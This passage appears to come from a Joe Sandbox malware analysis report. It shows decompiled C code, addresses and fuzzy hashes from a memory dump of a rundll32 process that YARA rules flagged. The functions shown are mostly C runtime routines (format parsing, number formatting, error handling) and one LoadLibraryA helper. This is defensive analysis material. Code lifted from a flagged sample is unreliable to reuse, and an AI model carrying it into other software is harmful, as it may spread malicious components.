				void* _t25;
				long long _t31;
				long long* _t35;
				intOrPtr _t38;
				long long _t46;
				long long _t50;
				void* _t53;

				_t31 = _t50;
				_v152 = 0xfffffffe;
				 *((long long*)(_t31 + 0x10)) = __rbx;
				 *((long long*)(_t31 + 0x20)) = __rsi;
				_t35 = __rcx;
				 *(_t31 + 8) =  *(_t31 + 8) & 0x00000000;
				if (__rcx == 0) goto 0x38718389;
				if ( *__rcx != 0) goto 0x38718389;
				E000001C31C33880B674(_t31, __rcx);
				_t46 = _t31;
				_a24 = _t31;
				_t38 =  *((intOrPtr*)(__rdx + 8));
				if (_t38 != 0) goto 0x38718328;
				goto 0x38718335;
				if ( *((intOrPtr*)(_t38 + 0x28)) != 0) goto 0x38718335;
				E000001C31C338718114(_t31, _t35,  &_v112, _t38 + 0x30);
				_a8 = 1;
				 *_t46 = 0x3889e168;
				 *(_t46 + 8) =  *(_t46 + 8) & 0x00000000;
				 *_t46 = 0x3889e1f8;
				E000001C31C33880A8FC(0x3889e1f8,  &_v144, _t38 + 0x30, _t53);
				asm("movups xmm0, [eax]");
				asm("movups [edi+0x10], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [edi+0x20], xmm1");
				 *_t35 = _t46;
				E000001C31C3387181AC(_t25,  &_v112);
				return 2;
			}














                                        0x1c3387182c8
                                        0x1c3387182d3
                                        0x1c3387182dc
                                        0x1c3387182e0
                                        0x1c3387182e7
                                        0x1c3387182ea
                                        0x1c3387182f1
                                        0x1c3387182fb
                                        0x1c338718306
                                        0x1c33871830b
                                        0x1c33871830e
                                        0x1c338718316
                                        0x1c33871831d
                                        0x1c338718326
                                        0x1c33871832f
                                        0x1c33871833a
                                        0x1c338718340
                                        0x1c338718352
                                        0x1c338718355
                                        0x1c338718360
                                        0x1c338718368
                                        0x1c33871836d
                                        0x1c338718370
                                        0x1c338718374
                                        0x1c338718378
                                        0x1c33871837c
                                        0x1c338718384
                                        0x1c3387183a2

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Locinfostd::_$GetctypeLocinfo::_Locinfo::~_
                                        • String ID:
                                        • API String ID: 1079120975-0
                                        • Opcode ID: 5e6238963374fccf7760cf20ed8fec3710a42fc4aad9a7a9750fee317ffc85ba
                                        • Instruction ID: 22bc937ebf56c1620319157bc6cb29c73b407bd259b9965f3ee5777c05e5f970
                                        • Opcode Fuzzy Hash: 5e6238963374fccf7760cf20ed8fec3710a42fc4aad9a7a9750fee317ffc85ba
                                        • Instruction Fuzzy Hash: 7E217972641BC095FB20CB14E545BD973A1F798BA4F44E322DBAC47BA5EB38C696C301
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3386E5C20 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E000001C31C3386E5C20(void* __rcx, void* __rdx) {

				if (__rcx != 0) goto 0x386e5c33;
				return 0;
			}



                                        0x1c3386e5c2a
                                        0x1c3386e5c32

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0d37bafe79ab884e732c02c6084ace85d5202ea00b8b743c5c86d92538d85b9c
                                        • Instruction ID: 452d837be1fdfdf00df42bef9a6a1281993652474d58dd079b702b6a6a4fcfbf
                                        • Opcode Fuzzy Hash: 0d37bafe79ab884e732c02c6084ace85d5202ea00b8b743c5c86d92538d85b9c
                                        • Instruction Fuzzy Hash: 2CF0B4B0BD278154FD0CE3758479BE811502F54B74F90AB269B3E457E1D91CE3864302
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338720690 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ConditionMask$InfoVerifyVersion
                                        • String ID:
                                        • API String ID: 2793162063-0
                                        • Opcode ID: 175b90c52bd3b8b682e508a983a5d93b5085cc08ec1970124611c601532be5d8
                                        • Instruction ID: d8b09b870c435c83306558a9b9ce6154390d1e0d4d1dd2195250231fc0a0b199
                                        • Opcode Fuzzy Hash: 175b90c52bd3b8b682e508a983a5d93b5085cc08ec1970124611c601532be5d8
                                        • Instruction Fuzzy Hash: A1110A36545A8486E634DF21F8407DAB3A5F78CB45F409216EF9A4BB58DB3CD249CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33871C1EC Relevance: 6.0, APIs: 4, Instructions: 49librarystringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 18%
                                        			E000001C31C33871C1EC(long long __rbx, void* __rcx, signed long long* __rdx, long long __rsi, long long _a24, long long _a32) {
				void* _v8;
				signed long long _v24;
				char _v280;
				void* __rdi;
				struct HINSTANCE__* _t16;
				void* _t17;
				void* _t18;
				void* _t21;
				void* _t22;
				signed long long _t27;
				signed long long _t28;
				void* _t47;
				void* _t52;
				void* _t55;
				void* _t56;

				_a24 = __rbx;
				_a32 = __rsi;
				_t27 =  *0x38903000; // 0x9bfaf736ae76
				_t28 = _t27 ^ _t52 - 0x00000130;
				_v24 = _t28;
				r8d = 0x100;
				E000001C31C33880E410(_t18, 0, _t21, _t22,  &_v280, __rdx, _t47, _t55);
				lstrcpyA(??, ??);
				__imp__StrChrA();
				if (_t28 != 0) goto 0x3871c252;
				goto 0x3871c28b;
				 *_t28 = 0;
				_t16 = LoadLibraryA(??);
				if (_t28 == 0) goto 0x3871c24e;
				if ( *((char*)(_t28 + 1)) != 0x23) goto 0x3871c27d;
				__imp__StrToIntA();
				 *__rdx = _t28;
				_t17 = E000001C31C33871C2B0(0x2e, __rdx, _t16, _t56);
				E000001C31C33880C290();
				return _t17;
			}


















                                        0x1c33871c1ec
                                        0x1c33871c1f1
                                        0x1c33871c1fe
                                        0x1c33871c205
                                        0x1c33871c208
                                        0x1c33871c21d
                                        0x1c33871c223
                                        0x1c33871c230
                                        0x1c33871c240
                                        0x1c33871c24c
                                        0x1c33871c250
                                        0x1c33871c257
                                        0x1c33871c25d
                                        0x1c33871c269
                                        0x1c33871c26e
                                        0x1c33871c274
                                        0x1c33871c280
                                        0x1c33871c286
                                        0x1c33871c296
                                        0x1c33871c2af

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LibraryLoadlstrcpy
                                        • String ID:
                                        • API String ID: 304781146-0
                                        • Opcode ID: 9ca075ae90b82dc8fddcd07e3df318c8d222eca4c1415a003c80a3802afae1d1
                                        • Instruction ID: 9bb98cf9718d61c6fca7da4e9e7f27b5d743a53f2097e00e843ebef9ea8e75fd
                                        • Opcode Fuzzy Hash: 9ca075ae90b82dc8fddcd07e3df318c8d222eca4c1415a003c80a3802afae1d1
                                        • Instruction Fuzzy Hash: C2118232245BC092FB61CB61E8157DA63A1FB9CB80F8491229E9D47B99DF3CC781C702
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338826870 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                        Download Yara Rule
                                        C-Code - Quality: 68%
                                        			E000001C31C338826870(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r9, long long _a8) {
				void* _t4;
				void* _t9;
				intOrPtr _t11;
				intOrPtr _t14;
				void* _t23;
				void* _t29;
				void* _t32;
				void* _t33;

				_t29 = __rdx;
				_t27 = __rcx;
				_t25 = __rbx;
				_t23 = __rax;
				_a8 = __rbx;
				GetLastError();
				_t11 =  *0x389032b0; // 0x7
				if (_t11 == 0xffffffff) goto 0x3882689a;
				_t4 = E000001C31C338826F7C(_t11, _t11 - 0xffffffff, __rax, __rbx, __rcx);
				if (__rax != 0) goto 0x388268db;
				E000001C31C338822114(_t4, _t27, _t29);
				_t32 = _t23;
				if (_t23 != 0) goto 0x388268ba;
				E000001C31C338824EE0(_t23, _t27);
				goto 0x388268f6;
				_t14 =  *0x389032b0; // 0x7
				if (E000001C31C338826FD4(_t14, _t23, _t23, _t25, _t27, _t23, _t33) == 0) goto 0x388268b3;
				E000001C31C3388265DC(_t32, _t23);
				_t9 = E000001C31C338824EE0(_t23, _t32);
				if (_t32 == 0) goto 0x388268f6;
				SetLastError(??);
				return _t9;
			}











                                        0x1c338826870
                                        0x1c338826870
                                        0x1c338826870
                                        0x1c338826870
                                        0x1c338826870
                                        0x1c33882687a
                                        0x1c338826880
                                        0x1c33882688b
                                        0x1c33882688d
                                        0x1c338826898
                                        0x1c3388268a4
                                        0x1c3388268a9
                                        0x1c3388268af
                                        0x1c3388268b3
                                        0x1c3388268b8
                                        0x1c3388268ba
                                        0x1c3388268cd
                                        0x1c3388268cf
                                        0x1c3388268d6
                                        0x1c3388268de
                                        0x1c3388268e2
                                        0x1c3388268f5

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$abort
                                        • String ID:
                                        • API String ID: 1447195878-0
                                        • Opcode ID: 979b99e8c2369e89e4b2a2efa61d5ab4c60160ca73a09f3242b90a8b4a1fc751
                                        • Instruction ID: cba8625192e97cc830742108d8b95d5b4005091e32d1ec35704d58e3d488e7ef
                                        • Opcode Fuzzy Hash: 979b99e8c2369e89e4b2a2efa61d5ab4c60160ca73a09f3242b90a8b4a1fc751
                                        • Instruction Fuzzy Hash: 05018C343817C443FA69EB34E655FE95192BB48BA0F14E12A9D364E7C2EE28CB804712
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3386E88E0 Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E000001C31C3386E88E0(void* __rdx) {

				if (__rdx != 0) goto 0x386e88f2;
				return 0;
			}



                                        0x1c3386e88e7
                                        0x1c3386e88f1

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0bf691473c3dc8e1f1a1c1771e97749a043232d717cb8ecec532a7da6f68d384
                                        • Instruction ID: 1e5cd3dd389e1575cc469f2168cd1c31d71d2723d9e6806643015d92cb9d0cdb
                                        • Opcode Fuzzy Hash: 0bf691473c3dc8e1f1a1c1771e97749a043232d717cb8ecec532a7da6f68d384
                                        • Instruction Fuzzy Hash: 4CF0B4F1B822C094FD08E31981867EC01A07B587B0FE0A7269A3E4A3E1EE1CD6964302
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33882803C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 83%
                                        			E000001C31C33882803C(void* __edx, void* __edi, void* __esp, long long __rbx, unsigned int* __rcx, signed long long __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* __r10, char* _a40, intOrPtr _a48, signed int _a56, intOrPtr _a64, intOrPtr _a72) {
				void* _v24;
				intOrPtr _v32;
				intOrPtr _v48;
				intOrPtr _v56;
				long long _v72;
				intOrPtr _v80;
				intOrPtr _v88;
				intOrPtr _v96;
				long long _v104;
				void* _t62;
				void* _t65;
				void* _t69;
				char _t70;
				char _t73;
				signed char _t75;
				void* _t86;
				intOrPtr _t87;
				void* _t88;
				signed int _t96;
				void* _t124;
				intOrPtr* _t139;
				char* _t143;
				long long _t171;
				signed long long _t174;
				intOrPtr* _t178;
				char* _t179;
				signed long long _t184;
				void* _t185;
				signed long long _t192;
				signed long long _t194;
				signed long long _t197;
				signed long long _t201;
				intOrPtr* _t202;
				char* _t203;
				intOrPtr* _t204;
				char* _t205;
				void* _t206;
				char* _t208;
				void* _t209;
				char* _t210;
				char* _t211;
				char* _t212;
				char* _t213;
				unsigned int* _t216;
				void* _t219;
				intOrPtr* _t221;
				char* _t227;
				long long _t235;
				intOrPtr* _t239;
				char* _t241;

				_t171 = __rbx;
				_t139 = _t221;
				 *((long long*)(_t139 + 8)) = __rbx;
				 *((long long*)(_t139 + 0x10)) = __rbp;
				 *((long long*)(_t139 + 0x18)) = __rsi;
				 *((long long*)(_t139 + 0x20)) = __rdi;
				_push(_t235);
				r12d = 0;
				_t201 = __rdx;
				 *((intOrPtr*)(__rdx)) = r12b;
				_t216 = __rcx;
				_t174 = _t139 - 0x38;
				_t219 = __r8;
				_t86 =  <  ? r12d : _a48;
				E000001C31C338811664(_t139, __rbx, _t174, _a72);
				if (__r8 - _t171 + 0xb > 0) goto 0x388280aa;
				_t62 = E000001C31C338818984(_t139);
				_t9 = _t235 + 0x22; // 0x22
				_t87 = _t9;
				 *_t139 = _t87;
				E000001C31C338811BC8(_t62);
				goto 0x38828365;
				if (( *__rcx >> 0x00000034 & _t174) != _t174) goto 0x38828135;
				_v72 = _t235;
				_v80 = _a64;
				_t192 = _t201;
				_t143 = _a40;
				_v88 = r12b;
				_v96 = _t87;
				_v104 = _t143;
				_t65 = E000001C31C33882839C(_t171, __rcx, _t192, __rcx, __r8);
				_t88 = _t65;
				if (_t65 == 0) goto 0x38828103;
				 *_t201 = r12b;
				goto 0x38828365;
				strrchr(_t241);
				if (_t143 == 0) goto 0x38828362;
				asm("sbb dl, dl");
				 *_t143 = 0xd0;
				 *((intOrPtr*)(_t143 + 3)) = r12b;
				goto 0x38828362;
				if (( *_t216 & 0x00000000) == 0) goto 0x3882814a;
				 *_t201 = 0x2d;
				_t202 = _t201 + 1;
				r15b = _a56;
				r10d = 0x30;
				asm("sbb edx, edx");
				if (( *_t216 & 0x00000000) != 0) goto 0x3882819d;
				 *_t202 = r10b;
				_t203 = _t202 + 1;
				asm("dec eax");
				goto 0x388281a3;
				 *_t203 = 0x31;
				_t204 = _t203 + 1;
				_t239 = _t204;
				_t205 = _t204 + 1;
				if (_t88 != 0) goto 0x388281b2;
				 *_t239 = r12b;
				goto 0x388281c6;
				 *_t239 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0xf8))))));
				if (( *_t216 & 0xffffffff) <= 0) goto 0x38828259;
				r8d = r10w & 0xffffffff;
				if (_t88 <= 0) goto 0x3882820f;
				_t69 =  ~r15b + r10w;
				_t124 = _t69 - 0x39;
				if (_t124 <= 0) goto 0x388281fd;
				_t70 = _t69 + 0xffffffff000000e7;
				 *_t205 = _t70;
				_t206 = _t205 + 1;
				r8w = r8w + 0xfffc;
				if (_t124 >= 0) goto 0x388281dd;
				if (r8w < 0) goto 0x38828259;
				_t96 = r8b;
				if (_t70 - 8 <= 0) goto 0x38828259;
				_t28 = _t206 - 1; // 0x2
				_t178 = _t28;
				if (( *_t178 - 0x00000046 & 0x000000df) != 0) goto 0x3882823e;
				 *_t178 = r10b;
				_t179 = _t178 - 1;
				goto 0x3882822e;
				if (_t179 == _t239) goto 0x38828256;
				_t73 =  *_t179;
				if (_t73 != 0x39) goto 0x38828250;
				 *_t179 = 0xffffffff00000121;
				goto 0x38828259;
				 *_t179 = _t73 + 1;
				goto 0x38828259;
				 *((char*)(_t179 - 1)) =  *((char*)(_t179 - 1)) + 1;
				if (_t88 - 1 <= 0) goto 0x38828274;
				_t75 = E000001C31C33880E410(_t96, r10b, __edi, __esp, _t206, _t192, _t206, _t171);
				r10d = 0x30;
				_t208 =  ==  ? _t239 : _t206 + _t171;
				r15b =  ~r15b;
				asm("sbb al, al");
				 *_t208 = (_t75 & 0x000000e0) + 0x70;
				if ( *_t239 - r12b < 0) goto 0x388282a2;
				 *((char*)(_t208 + 1)) = 0x2b;
				_t209 = _t208 + 2;
				goto 0x388282ad;
				 *((char*)(_t209 + 1)) = 0x2d;
				_t210 = _t209 + 2;
				_t184 =  ~(( *_t216 >> 0x34) - _t219);
				 *_t210 = r10b;
				_t227 = _t210;
				if (_t184 - 0x3e8 < 0) goto 0x388282ef;
				_t194 = (_t192 >> 7) + (_t192 >> 7 >> 0x3f);
				 *_t210 = __r10 + _t194;
				_t211 = _t210 + 1;
				_t185 = _t184 + _t194 * 0xfffffc18;
				if (_t211 != _t227) goto 0x388282f5;
				if (_t185 - 0x64 < 0) goto 0x38828323;
				_t197 = (_t194 + _t185 >> 6) + (_t194 + _t185 >> 6 >> 0x3f);
				 *_t211 = __r10 + _t197;
				_t212 = _t211 + 1;
				if (_t212 != _t227) goto 0x3882832e;
				if (_t185 + _t197 * 0xffffff9c - 0xa < 0) goto 0x38828359;
				 *_t212 = __r10 + (_t197 >> 2) + (_t197 >> 2 >> 0x3f);
				_t213 = _t212 + 1;
				 *_t213 = (_t96 & 0x000007ff) + r10b;
				 *((intOrPtr*)(_t213 + 1)) = r12b;
				if (_v32 == r12b) goto 0x38828378;
				 *(_v56 + 0x3a8) =  *(_v56 + 0x3a8) & 0xfffffffd;
				return r12d;
			}





















































                                        0x1c33882803c
                                        0x1c33882803c
                                        0x1c33882803f
                                        0x1c338828043
                                        0x1c338828047
                                        0x1c33882804b
                                        0x1c33882804f
                                        0x1c338828060
                                        0x1c338828063
                                        0x1c338828066
                                        0x1c338828071
                                        0x1c338828076
                                        0x1c33882807d
                                        0x1c338828080
                                        0x1c338828084
                                        0x1c338828092
                                        0x1c338828094
                                        0x1c338828099
                                        0x1c338828099
                                        0x1c33882809e
                                        0x1c3388280a0
                                        0x1c3388280a5
                                        0x1c3388280bc
                                        0x1c3388280c8
                                        0x1c3388280d0
                                        0x1c3388280d4
                                        0x1c3388280d7
                                        0x1c3388280e2
                                        0x1c3388280e7
                                        0x1c3388280eb
                                        0x1c3388280f0
                                        0x1c3388280f5
                                        0x1c3388280f9
                                        0x1c3388280fb
                                        0x1c3388280fe
                                        0x1c33882810b
                                        0x1c338828113
                                        0x1c338828122
                                        0x1c33882812a
                                        0x1c33882812c
                                        0x1c338828130
                                        0x1c338828142
                                        0x1c338828144
                                        0x1c338828147
                                        0x1c33882814a
                                        0x1c33882815a
                                        0x1c338828176
                                        0x1c338828181
                                        0x1c338828183
                                        0x1c338828186
                                        0x1c338828192
                                        0x1c33882819b
                                        0x1c33882819d
                                        0x1c3388281a0
                                        0x1c3388281a3
                                        0x1c3388281a6
                                        0x1c3388281ab
                                        0x1c3388281ad
                                        0x1c3388281b0
                                        0x1c3388281c3
                                        0x1c3388281c9
                                        0x1c3388281cf
                                        0x1c3388281df
                                        0x1c3388281f0
                                        0x1c3388281f4
                                        0x1c3388281f8
                                        0x1c3388281fa
                                        0x1c3388281fd
                                        0x1c338828201
                                        0x1c338828208
                                        0x1c33882820d
                                        0x1c338828213
                                        0x1c338828218
                                        0x1c338828228
                                        0x1c33882822a
                                        0x1c33882822a
                                        0x1c338828234
                                        0x1c338828236
                                        0x1c338828239
                                        0x1c33882823c
                                        0x1c338828241
                                        0x1c338828243
                                        0x1c338828247
                                        0x1c33882824c
                                        0x1c33882824e
                                        0x1c338828252
                                        0x1c338828254
                                        0x1c338828256
                                        0x1c33882825b
                                        0x1c338828266
                                        0x1c33882826e
                                        0x1c338828277
                                        0x1c33882827b
                                        0x1c33882827e
                                        0x1c338828284
                                        0x1c338828296
                                        0x1c338828298
                                        0x1c33882829c
                                        0x1c3388282a0
                                        0x1c3388282a2
                                        0x1c3388282a6
                                        0x1c3388282aa
                                        0x1c3388282ad
                                        0x1c3388282b0
                                        0x1c3388282ba
                                        0x1c3388282d4
                                        0x1c3388282db
                                        0x1c3388282dd
                                        0x1c3388282e7
                                        0x1c3388282ed
                                        0x1c3388282f3
                                        0x1c338828310
                                        0x1c338828317
                                        0x1c338828319
                                        0x1c338828326
                                        0x1c33882832c
                                        0x1c33882834d
                                        0x1c33882834f
                                        0x1c33882835c
                                        0x1c33882835e
                                        0x1c33882836a
                                        0x1c338828371
                                        0x1c338828398

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: gfffffff
                                        • API String ID: 3215553584-1523873471
                                        • Opcode ID: 0394c0a12d31b090ba6d4f006549612a7ab558deccbf8bb91b018acd81be3e69
                                        • Instruction ID: a76af8be5386457e1e548492595462c6b094e5057678723eaba65e2862ea5e5b
                                        • Opcode Fuzzy Hash: 0394c0a12d31b090ba6d4f006549612a7ab558deccbf8bb91b018acd81be3e69
                                        • Instruction Fuzzy Hash: 8A9122726457C586FF258F29E540BEC6B95F765BC0F04E922CEA90B7E6DA38C611C302
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3388141F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: *
                                        • API String ID: 3215553584-163128923
                                        • Opcode ID: d1b3c8bcca7984e45a2e1b92871d71e663809e6980a90e537f3949267acdaa75
                                        • Instruction ID: fef2ca62f9f5e41666c3fb42b946f075e417e61424aa695bc6a376e9c9b61968
                                        • Opcode Fuzzy Hash: d1b3c8bcca7984e45a2e1b92871d71e663809e6980a90e537f3949267acdaa75
                                        • Instruction Fuzzy Hash: B3718172181691C6F764CF248084AEC3BB2F345F48F25A117DE664B299DF31CB92C796
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338813CF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 22%
                                        			E000001C31C338813CF0(void* __edx, signed int __edi, long long __rbx, void* __rcx, void* __rdx, long long __rdi, signed int __rsi, void* __rbp, long long __r14, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t83;
				unsigned int _t91;
				signed int _t99;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t118;
				unsigned int _t126;
				intOrPtr* _t143;
				void* _t150;
				signed int _t162;
				intOrPtr* _t165;
				void* _t170;

				_t162 = __rsi;
				_t143 = _t165;
				 *((long long*)(_t143 + 8)) = __rbx;
				 *((long long*)(_t143 + 0x10)) = __rsi;
				 *((long long*)(_t143 + 0x18)) = __rdi;
				 *((long long*)(_t143 + 0x20)) = __r14;
				_t150 = __rcx;
				if ( *((intOrPtr*)(__rcx + 0x468)) != __rsi) goto 0x38813d2f;
				_t83 = E000001C31C338818984(_t143);
				 *_t143 = 0x16;
				E000001C31C338811BC8(_t83);
				goto 0x38813f36;
				if ( *((intOrPtr*)(__rcx + 0x18)) == __rsi) goto 0x38813d17;
				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x470)) == 2) goto 0x38813f33;
				_t118 = __edi | 0xffffffff;
				r14d = __rdi + 0x21;
				 *((intOrPtr*)(__rcx + 0x50)) = 0;
				 *(__rcx + 0x2c) = 0;
				goto 0x38813f07;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 2;
				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0x38813f20;
				if (( *(__rcx + 0x42) & 0x0000ffff) - r14w - 0x5a > 0) goto 0x38813d8f;
				goto 0x38813d91;
				_t91 = ( *(_t143 + 0x388a2990) & 0x000000ff) >> 4;
				 *(__rcx + 0x2c) = _t91;
				if (_t91 == 8) goto 0x38813f51;
				_t126 = _t91;
				if (_t126 == 0) goto 0x38813eb7;
				if (_t126 == 0) goto 0x38813ea3;
				if (_t126 == 0) goto 0x38813e64;
				if (_t126 == 0) goto 0x38813e32;
				if (_t126 == 0) goto 0x38813e2a;
				if (_t126 == 0) goto 0x38813df9;
				if (_t126 == 0) goto 0x38813dec;
				if (_t91 - 0xfffffffffffffffc != 1) goto 0x38813f61;
				0x388151b4(_t170);
				goto 0x38813f03;
				0x38814974();
				goto 0x38813f03;
				if ( *(__rcx + 0x42) == 0x2a) goto 0x38813e11;
				E000001C31C33881385C(__rcx, __rcx, __rcx + 0x38, __rsi, __rbp);
				goto 0x38813f03;
				 *((long long*)(__rcx + 0x20)) =  *((long long*)(__rcx + 0x20)) + 8;
				_t106 =  *( *((intOrPtr*)(__rcx + 0x20)) - 8);
				_t107 =  <  ? _t118 : _t106;
				 *(__rcx + 0x38) =  <  ? _t118 : _t106;
				goto 0x38813f01;
				 *(__rcx + 0x38) = 0;
				goto 0x38813f07;
				if ( *(__rcx + 0x42) == 0x2a) goto 0x38813e3f;
				goto 0x38813e04;
				 *((long long*)(__rcx + 0x20)) =  *((long long*)(__rcx + 0x20)) + 8;
				_t108 =  *( *((intOrPtr*)(__rcx + 0x20)) - 8);
				 *(__rcx + 0x34) = _t108;
				if (_t108 >= 0) goto 0x38813f01;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000004;
				 *(__rcx + 0x34) =  ~_t108;
				goto 0x38813f01;
				_t99 =  *(__rcx + 0x42) & 0x0000ffff;
				if (_t99 == r14d) goto 0x38813e9d;
				if (_t99 == 0x23) goto 0x38813e97;
				if (_t99 == 0x2b) goto 0x38813e91;
				if (_t99 == 0x2d) goto 0x38813e8b;
				if (_t99 != 0x30) goto 0x38813f07;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000008;
				goto 0x38813f07;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000004;
				goto 0x38813f07;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000001;
				goto 0x38813f07;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | r14d;
				goto 0x38813f07;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000002;
				goto 0x38813f07;
				 *(__rcx + 0x30) = _t162;
				 *((intOrPtr*)(__rcx + 0x40)) = sil;
				 *(__rcx + 0x38) = _t118;
				 *((intOrPtr*)(__rcx + 0x3c)) = 0;
				 *((intOrPtr*)(__rcx + 0x54)) = sil;
				goto 0x38813f07;
				r8d =  *(__rcx + 0x42) & 0x0000ffff;
				 *((char*)(__rcx + 0x54)) = 1;
				if (( *( *((intOrPtr*)(__rcx + 0x468)) + 0x14) >> 0x0000000c & 0x00000001) == 0) goto 0x38813edf;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x468)) + 8)) == _t162) goto 0x38813efe;
				if (E000001C31C338828C50(r8w & 0xffffffff, __rcx,  *((intOrPtr*)(__rcx + 0x468))) != 0xffff) goto 0x38813efe;
				 *(_t150 + 0x28) = _t118;
				goto 0x38813f01;
				 *(_t150 + 0x28) =  *(_t150 + 0x28) + 1;
				if (1 == 0) goto 0x38813f61;
				_t114 =  *( *(_t150 + 0x18)) & 0x0000ffff;
				 *(_t150 + 0x42) = _t114;
				if (_t114 != 0) goto 0x38813d61;
				 *(_t150 + 0x18) =  &(( *(_t150 + 0x18))[1]);
				 *((intOrPtr*)(_t150 + 0x470)) =  *((intOrPtr*)(_t150 + 0x470)) + 1;
				if ( *((intOrPtr*)(_t150 + 0x470)) != 2) goto 0x38813d56;
				return  *(_t150 + 0x28);
			}
















                                        0x1c338813cf0
                                        0x1c338813cf0
                                        0x1c338813cf3
                                        0x1c338813cf7
                                        0x1c338813cfb
                                        0x1c338813cff
                                        0x1c338813d0b
                                        0x1c338813d15
                                        0x1c338813d17
                                        0x1c338813d1c
                                        0x1c338813d22
                                        0x1c338813d2a
                                        0x1c338813d33
                                        0x1c338813d35
                                        0x1c338813d42
                                        0x1c338813d48
                                        0x1c338813d52
                                        0x1c338813d56
                                        0x1c338813d59
                                        0x1c338813d5c
                                        0x1c338813d61
                                        0x1c338813d69
                                        0x1c338813d7e
                                        0x1c338813d8d
                                        0x1c338813d99
                                        0x1c338813d9c
                                        0x1c338813da2
                                        0x1c338813da8
                                        0x1c338813daa
                                        0x1c338813db3
                                        0x1c338813dbc
                                        0x1c338813dc5
                                        0x1c338813dca
